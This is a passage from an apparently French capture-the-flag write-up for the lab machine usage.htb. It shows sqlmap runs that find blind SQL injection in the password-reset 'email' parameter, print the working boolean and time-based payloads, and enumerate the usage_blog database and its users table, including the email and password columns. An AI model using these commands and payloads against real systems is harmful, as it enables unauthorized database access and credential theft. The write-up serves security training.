heuristic (basic) test shows that POST parameter &#39;email&#39; might not be injectable </span></span></span><span class="line"><span class="cl"><span class="s2">[23:16:10] [INFO] testing for SQL injection on POST parameter &#39;email&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:16:10] [INFO] testing &#39;AND boolean-based blind - WHERE or HAVING clause&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:16:55] [INFO] testing &#39;OR boolean-based blind - WHERE or HAVING clause&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:09] [INFO] testing &#39;OR boolean-based blind - WHERE or HAVING clause (NOT)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:25] [INFO] testing &#39;AND boolean-based blind - WHERE or HAVING clause (subquery - comment)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:25] [INFO] POST parameter &#39;email&#39; appears to be &#39;AND boolean-based blind - WHERE or HAVING clause (subquery - comment)&#39; injectable </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:28] [INFO] heuristic (extended) test shows that the back-end DBMS could be &#39;MySQL&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">it looks like the back-end DBMS is &#39;MySQL&#39;. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:28] [INFO] testing &#39;MySQL &gt;= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:28] [INFO] testing &#39;MySQL &gt;= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:29] [INFO] testing &#39;MySQL &gt;= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:29] [INFO] testing &#39;MySQL &gt;= 5.5 OR error-based - WHERE or HAVING clause (EXP)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:29] [INFO] testing &#39;MySQL &gt;= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:29] [INFO] testing &#39;MySQL &gt;= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:29] [INFO] testing &#39;MySQL &gt;= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:29] [INFO] testing &#39;MySQL &gt;= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:30] [INFO] testing &#39;MySQL &gt;= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:30] [INFO] testing &#39;MySQL &gt;= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:30] [INFO] testing &#39;MySQL &gt;= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:30] [INFO] testing &#39;MySQL &gt;= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:30] [INFO] testing &#39;MySQL &gt;= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:30] [INFO] testing &#39;MySQL &gt;= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:30] [INFO] testing &#39;MySQL &gt;= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:31] [INFO] testing &#39;MySQL &gt;= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:31] [INFO] testing &#39;MySQL OR error-based - WHERE or HAVING clause (FLOOR)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:31] [INFO] testing &#39;MySQL &gt;= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:31] [INFO] testing &#39;MySQL &gt;= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:31] [INFO] testing &#39;MySQL &gt;= 5.5 error-based - Parameter replace (EXP)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:31] [INFO] testing &#39;MySQL &gt;= 5.6 error-based - Parameter replace (GTID_SUBSET)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:31] [INFO] testing &#39;MySQL &gt;= 5.7.8 error-based - Parameter replace (JSON_KEYS)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:31] [INFO] testing &#39;MySQL &gt;= 5.0 error-based - Parameter replace (FLOOR)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:31] [INFO] testing &#39;MySQL &gt;= 5.1 error-based - Parameter replace (UPDATEXML)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:31] [INFO] testing &#39;MySQL &gt;= 5.1 error-based - Parameter replace (EXTRACTVALUE)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:31] [INFO] testing &#39;Generic inline queries&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:31] [INFO] testing &#39;MySQL inline queries&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:31] [INFO] testing &#39;MySQL &gt;= 5.0.12 stacked queries (comment)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:31] [INFO] testing &#39;MySQL &gt;= 5.0.12 stacked queries&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:32] [INFO] testing &#39;MySQL &gt;= 5.0.12 stacked queries (query SLEEP - comment)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:32] [INFO] testing &#39;MySQL &gt;= 5.0.12 stacked queries (query SLEEP)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:32] [INFO] testing &#39;MySQL &lt; 5.0.12 stacked queries (BENCHMARK - comment)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:32] [INFO] testing &#39;MySQL &lt; 5.0.12 stacked queries (BENCHMARK)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:32] [INFO] testing &#39;MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:32] [INFO] testing &#39;MySQL &gt;= 5.0.12 OR time-based blind (query SLEEP)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:33] [INFO] testing &#39;MySQL &gt;= 5.0.12 AND time-based blind (SLEEP)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:33] [INFO] testing &#39;MySQL &gt;= 5.0.12 OR time-based blind (SLEEP)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:33] [INFO] testing &#39;MySQL &gt;= 5.0.12 AND time-based blind (SLEEP - comment)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:33] [INFO] testing &#39;MySQL &gt;= 5.0.12 OR time-based blind (SLEEP - comment)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:33] [INFO] testing &#39;MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP - comment)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:33] [INFO] testing &#39;MySQL &gt;= 5.0.12 OR time-based blind (query SLEEP - comment)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:34] [INFO] testing &#39;MySQL &lt; 5.0.12 AND time-based blind (BENCHMARK)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:17:34] [INFO] testing &#39;MySQL &gt; 5.0.12 AND time-based blind (heavy query)&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:18:34] [INFO] POST parameter &#39;email&#39; appears to be &#39;MySQL &gt; 5.0.12 AND time-based blind (heavy query)&#39; injectable </span></span></span><span class="line"><span class="cl"><span class="s2">[23:18:34] [INFO] testing &#39;Generic UNION query (NULL) - 1 to 20 columns&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:18:34] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found </span></span></span><span class="line"><span class="cl"><span class="s2">[23:18:39] [INFO] &#39;ORDER BY&#39; technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test </span></span></span><span class="line"><span class="cl"><span class="s2">[23:18:42] [INFO] target URL appears to have 8 columns in query </span></span></span><span class="line"><span class="cl"><span class="s2">do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] N </span></span></span><span class="line"><span class="cl"><span class="s2">injection not exploitable with NULL values. Do you want to try with a random integer value for option &#39;--union-char&#39;? [Y/n] Y </span></span></span><span class="line"><span class="cl"><span class="s2">[23:19:49] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. &#39;--dbms=mysql&#39;) </span></span></span><span class="line"><span class="cl"><span class="s2">[23:20:09] [INFO] target URL appears to be UNION injectable with 8 columns </span></span></span><span class="line"><span class="cl"><span class="s2">injection not exploitable with NULL values. Do you want to try with a random integer value for option &#39;--union-char&#39;? [Y/n] Y </span></span></span><span class="line"><span class="cl"><span class="s2">[23:21:28] [INFO] testing &#39;Generic UNION query (53) - 21 to 40 columns&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:21:50] [INFO] testing &#39;Generic UNION query (53) - 41 to 60 columns&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:22:08] [INFO] testing &#39;Generic UNION query (53) - 61 to 80 columns&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:22:31] [INFO] testing &#39;Generic UNION query (53) - 81 to 100 columns&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:22:53] [INFO] testing &#39;MySQL UNION query (53) - 1 to 20 columns&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:23:41] [INFO] testing &#39;MySQL UNION query (53) - 21 to 40 columns&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:24:07] [INFO] testing &#39;MySQL UNION query (53) - 41 to 60 columns&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:24:24] [INFO] testing &#39;MySQL UNION query (53) - 61 to 80 columns&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:24:45] [INFO] testing &#39;MySQL UNION query (53) - 81 to 100 columns&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:25:14] [INFO] checking if the injection point on POST parameter &#39;email&#39; is a false positive </span></span></span><span class="line"><span class="cl"><span class="s2">POST parameter &#39;email&#39; is vulnerable. Do you want to keep testing the others (if any)? [y/N] N </span></span></span><span class="line"><span class="cl"><span class="s2">sqlmap identified the following injection point(s) with a total of 735 HTTP(s) requests: </span></span></span><span class="line"><span class="cl"><span class="s2">--- </span></span></span><span class="line"><span class="cl"><span class="s2">Parameter: email (POST) </span></span></span><span class="line"><span class="cl"><span class="s2"> Type: boolean-based blind </span></span></span><span class="line"><span class="cl"><span class="s2"> Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) </span></span></span><span class="line"><span class="cl"><span class="s2"> Payload: _token=SPlfAxte0uocmjyWay8x9TCSAcphFEZMqPL4gIIh&amp;email=leopold&#39; AND 5458=(SELECT (CASE WHEN (5458=5458) THEN 5458 ELSE (SELECT 4624 UNION SELECT 6593) END))-- UEue </span></span></span><span class="line"><span class="cl"><span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2"> Type: time-based blind </span></span></span><span class="line"><span class="cl"><span class="s2"> Title: MySQL &gt; 5.0.12 AND time-based blind (heavy query) </span></span></span><span class="line"><span class="cl"><span class="s2"> Payload: _token=SPlfAxte0uocmjyWay8x9TCSAcphFEZMqPL4gIIh&amp;email=leopold&#39; AND 1208=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)-- zgvX </span></span></span><span class="line"><span class="cl"><span class="s2">--- </span></span></span><span class="line"><span class="cl"><span class="s2">[23:25:34] [INFO] the back-end DBMS is MySQL </span></span></span><span class="line"><span class="cl"><span class="s2">web server operating system: Linux Ubuntu </span></span></span><span class="line"><span class="cl"><span class="s2">web application technology: Nginx 1.18.0 </span></span></span><span class="line"><span class="cl"><span class="s2">back-end DBMS: MySQL &gt; 5.0.12 </span></span></span><span class="line"><span class="cl"><span class="s2">[23:25:41] [INFO] fetching database names </span></span></span><span class="line"><span class="cl"><span class="s2">[23:25:41] [INFO] fetching number of databases </span></span></span><span class="line"><span class="cl"><span class="s2">[23:25:41] [INFO] retrieved: 3 </span></span></span><span class="line"><span class="cl"><span class="s2">[23:25:47] [INFO] retrieving the length of query output </span></span></span><span class="line"><span class="cl"><span class="s2">[23:25:47] [INFO] retrieved: 18 </span></span></span><span class="line"><span class="cl"><span class="s2">[23:26:30] [INFO] retrieved: information_schema </span></span></span><span class="line"><span class="cl"><span class="s2">[23:26:30] [INFO] retrieving the length of query output </span></span></span><span class="line"><span class="cl"><span class="s2">[23:26:30] [INFO] retrieved: 18 </span></span></span><span class="line"><span class="cl"><span class="s2">[23:27:10] [INFO] retrieved: performance_schema </span></span></span><span class="line"><span class="cl"><span class="s2">[23:27:10] [INFO] retrieving the length of query output </span></span></span><span class="line"><span class="cl"><span class="s2">[23:27:10] [INFO] retrieved: 10 </span></span></span><span class="line"><span class="cl"><span class="s2">[23:27:36] [INFO] retrieved: usage_blog </span></span></span><span class="line"><span class="cl"><span class="s2">available databases [3]: </span></span></span><span class="line"><span class="cl"><span class="s2">[*] information_schema </span></span></span><span class="line"><span class="cl"><span class="s2">[*] performance_schema </span></span></span><span class="line"><span class="cl"><span class="s2">[*] usage_blog </span></span></span><span class="line"><span class="cl"><span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2">[23:27:36] [WARNING] HTTP error codes detected during run: </span></span></span><span class="line"><span class="cl"><span class="s2">500 (Internal Server Error) - 511 times </span></span></span><span class="line"><span class="cl"><span class="s2">[23:27:36] [INFO] fetched data logged to text files under &#39;/home/leopold/.local/share/sqlmap/output/usage.htb&#39; </span></span></span><span class="line"><span class="cl"><span class="s2">[23:27:36] [WARNING] your sqlmap version is outdated </span></span></span><span class="line"><span class="cl"><span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2">[*] ending @ 23:27:36 /2024-08-06/ </span></span></span></code></pre></td></tr></table> </div> </div><p>Il est bien vulnérable ! On trouve une base de donnée mysql : <code>usage_blog</code></p> <h3 id="mysql---usage_blog">MySQL - usage_blog </h3><p>A l&rsquo;aide de plusieurs requête, on trouve un table <code>users</code> dans la base de données <code>usage_blog</code>. Dans cette bdd, on trouve les champs:</p> <ul> <li>email</li> <li>password</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span><span class="lnt">73 </span><span class="lnt">74 </span><span class="lnt">75 </span><span class="lnt">76 </span><span class="lnt">77 </span><span class="lnt">78 </span><span class="lnt">79 </span><span class="lnt">80 </span><span class="lnt">81 </span><span class="lnt">82 </span><span class="lnt">83 </span><span class="lnt">84 </span><span class="lnt">85 </span><span class="lnt">86 </span><span class="lnt">87 </span><span class="lnt">88 </span><span class="lnt">89 </span><span class="lnt">90 </span><span class="lnt">91 </span><span class="lnt">92 </span><span class="lnt">93 </span><span class="lnt">94 </span><span class="lnt">95 </span><span class="lnt">96 </span><span class="lnt">97 </span><span class="lnt">98 </span><span class="lnt">99 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ sqlmap -r request.txt --data<span class="o">=</span><span class="s2">&#34;_token=SPlfAxte0uocmjyWay8x9TCSAcphFEZMqPL4gIIh&amp;email=leopold&#34;</span> -p email --batch --level <span class="m">5</span> --risk <span class="m">3</span> --threads <span class="m">10</span> -D usage_blog -T users --columns </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> ___ </span></span><span class="line"><span class="cl"> __H__ </span></span><span class="line"><span class="cl"> ___ ___<span class="o">[</span>.<span class="o">]</span>_____ ___ ___ <span class="o">{</span>1.6.4#stable<span class="o">}</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ -<span class="p">|</span> . <span class="o">[</span>,<span class="o">]</span> <span class="p">|</span> .<span class="s1">&#39;| . | </span></span></span><span class="line"><span class="cl"><span class="s1">|___|_ [.]_|_|_|__,| _| </span></span></span><span class="line"><span class="cl"><span class="s1"> |_|V... |_| https://sqlmap.org </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user&#39;</span>s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible <span class="k">for</span> any misuse or damage caused by this program </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> starting @ 23:30:20 /2024-08-06/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:30:20<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> parsing HTTP request from <span class="s1">&#39;request.txt&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:30:21<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> resuming back-end DBMS <span class="s1">&#39;mysql&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:30:21<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> testing connection to the target URL </span></span><span class="line"><span class="cl">got a <span class="m">302</span> redirect to <span class="s1">&#39;http://usage.htb/forget-password&#39;</span>. Do you want to follow? <span class="o">[</span>Y/n<span class="o">]</span> Y </span></span><span class="line"><span class="cl">redirect is a result of a POST request. Do you want to resend original POST data to a new location? <span class="o">[</span>Y/n<span class="o">]</span> Y </span></span><span class="line"><span class="cl">sqlmap resumed the following injection point<span class="o">(</span>s<span class="o">)</span> from stored session: </span></span><span class="line"><span class="cl">--- </span></span><span class="line"><span class="cl">Parameter: email <span class="o">(</span>POST<span class="o">)</span> </span></span><span class="line"><span class="cl"> Type: boolean-based blind </span></span><span class="line"><span class="cl"> Title: AND boolean-based blind - WHERE or HAVING clause <span class="o">(</span>subquery - comment<span class="o">)</span> </span></span><span class="line"><span class="cl"> Payload: <span class="nv">_token</span><span class="o">=</span>SPlfAxte0uocmjyWay8x9TCSAcphFEZMqPL4gIIh<span class="p">&amp;</span><span class="nv">email</span><span class="o">=</span>leopold<span class="s1">&#39; AND 5458=(SELECT (CASE WHEN (5458=5458) THEN 5458 ELSE (SELECT 4624 UNION SELECT 6593) END))-- UEue </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1"> Type: time-based blind </span></span></span><span class="line"><span class="cl"><span class="s1"> Title: MySQL &gt; 5.0.12 AND time-based blind (heavy query) </span></span></span><span class="line"><span class="cl"><span class="s1"> Payload: _token=SPlfAxte0uocmjyWay8x9TCSAcphFEZMqPL4gIIh&amp;email=leopold&#39;</span> AND <span class="nv">1208</span><span class="o">=(</span>SELECT COUNT<span class="o">(</span>*<span class="o">)</span> FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C<span class="o">)</span>-- zgvX </span></span><span class="line"><span class="cl">--- </span></span><span class="line"><span class="cl"><span class="o">[</span>23:30:23<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> the back-end DBMS is MySQL </span></span><span class="line"><span class="cl">web server operating system: Linux Ubuntu </span></span><span class="line"><span class="cl">web application technology: Nginx 1.18.0 </span></span><span class="line"><span class="cl">back-end DBMS: MySQL &gt; 5.0.12 </span></span><span class="line"><span class="cl"><span class="o">[</span>23:30:23<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> fetching columns <span class="k">for</span> table <span class="s1">&#39;users&#39;</span> in database <span class="s1">&#39;usage_blog&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:30:23<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: </span></span><span class="line"><span class="cl">you provided a HTTP Cookie header value, <span class="k">while</span> target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? <span class="o">[</span>Y/n<span class="o">]</span> Y </span></span><span class="line"><span class="cl"><span class="m">8</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:30:32<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieving the length of query output </span></span><span class="line"><span class="cl"><span class="o">[</span>23:30:32<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: <span class="m">10</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:31:00<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: created_at </span></span><span class="line"><span class="cl"><span class="o">[</span>23:31:00<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieving the length of query output </span></span><span class="line"><span class="cl"><span class="o">[</span>23:31:00<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: <span class="m">9</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:31:16<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: timestamp </span></span><span class="line"><span class="cl"><span class="o">[</span>23:31:16<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieving the length of query output </span></span><span class="line"><span class="cl"><span class="o">[</span>23:31:16<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: <span class="m">5</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:31:34<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: email <span class="o">&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;</span>&lt;&lt; </span></span><span class="line"><span class="cl"><span class="o">[</span>23:31:34<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieving the length of query output </span></span><span class="line"><span class="cl"><span class="o">[</span>23:31:34<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: <span class="m">12</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:32:10<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: varchar<span class="o">(</span>255<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:32:10<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieving the length of query output </span></span><span class="line"><span class="cl"><span class="o">[</span>23:32:10<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: <span class="m">17</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:32:54<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: email_verified_at </span></span><span class="line"><span class="cl"><span class="o">[</span>23:32:54<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieving the length of query output </span></span><span class="line"><span class="cl"><span class="o">[</span>23:32:54<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: <span class="m">9</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:33:21<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: timestamp </span></span><span class="line"><span class="cl"><span class="o">[</span>23:33:21<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieving the length of query output </span></span><span class="line"><span class="cl"><span class="o">[</span>23:33:21<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: <span class="m">2</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:33:42<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: id </span></span><span class="line"><span class="cl"><span class="o">[</span>23:33:42<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieving the length of query output </span></span><span class="line"><span class="cl"><span class="o">[</span>23:33:42<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: <span class="m">15</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:34:15<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: bigint unsigned </span></span><span class="line"><span class="cl"><span class="o">[</span>23:34:16<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieving the length of query output </span></span><span class="line"><span class="cl"><span class="o">[</span>23:34:15<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: <span class="m">4</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:34:38<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: name </span></span><span class="line"><span class="cl"><span class="o">[</span>23:34:38<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieving the length of query output </span></span><span class="line"><span class="cl"><span class="o">[</span>23:34:38<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: <span class="m">12</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:35:37<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: varchar<span class="o">(</span>255<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:35:37<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieving the length of query output </span></span><span class="line"><span class="cl"><span class="o">[</span>23:35:37<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: <span class="m">8</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:36:10<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: password <span class="o">&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;</span>&lt; </span></span><span class="line"><span class="cl"><span class="o">[</span>23:36:10<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieving the length of query output </span></span><span class="line"><span class="cl"><span class="o">[</span>23:36:10<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: <span class="m">12</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:37:11<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: varchar<span class="o">(</span>255<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>23:37:11<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieving the length of query output </span></span><span class="line"><span class="cl"><span class="o">[</span>23:37:11<span class="o">]</span> <span class="o">[</span>INFO<span class="o">]</span> retrieved: <span class="m">14</span> </span></span><span class="line"><span class="cl"><span 